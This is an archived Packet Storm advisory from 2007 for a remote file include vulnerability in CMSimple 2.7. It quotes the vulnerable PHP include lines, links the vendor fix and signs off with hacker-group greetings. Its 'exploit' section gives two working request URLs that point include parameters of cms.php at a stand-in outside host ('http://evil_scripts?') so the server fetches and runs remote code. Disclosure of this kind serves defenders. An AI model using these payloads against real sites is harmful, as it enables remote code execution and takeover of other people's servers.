cmsimple27-rfi.txt

2007-01-24T00:00:00
ID PACKETSTORM:53853
Type packetstorm
Reporter Alkomandoz
Modified 2007-01-24T00:00:00

Description

                                        
                                            `-----------------------------------------------  
  
cmsimple 2.7 Remote File Include  
  
-----------------------------------------------  
  
  
Author: Alk()mand()z  
  
-----------------------------------------------  
  
Vuln Code:  
  
if (!@ include ($pth['file']['plugin_index']))  
  
  
  
{if(@include($pth['file']['image']))exit;}  
  
  
  
  
-----------------------------------------------  
  
3xplo!t:  
  
cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://evil_scripts?  
  
  
cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http://evil_scripts?  
  
-----------------------------------------------  
  
download: http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip  
  
-----------------------------------------------  
  
  
Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa  
  
  
SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team  
  
  
  
##################################  
  
AsB-MaY.NeT & MoHaNdKo.CoM  
  
##################################  
  
  
--   
`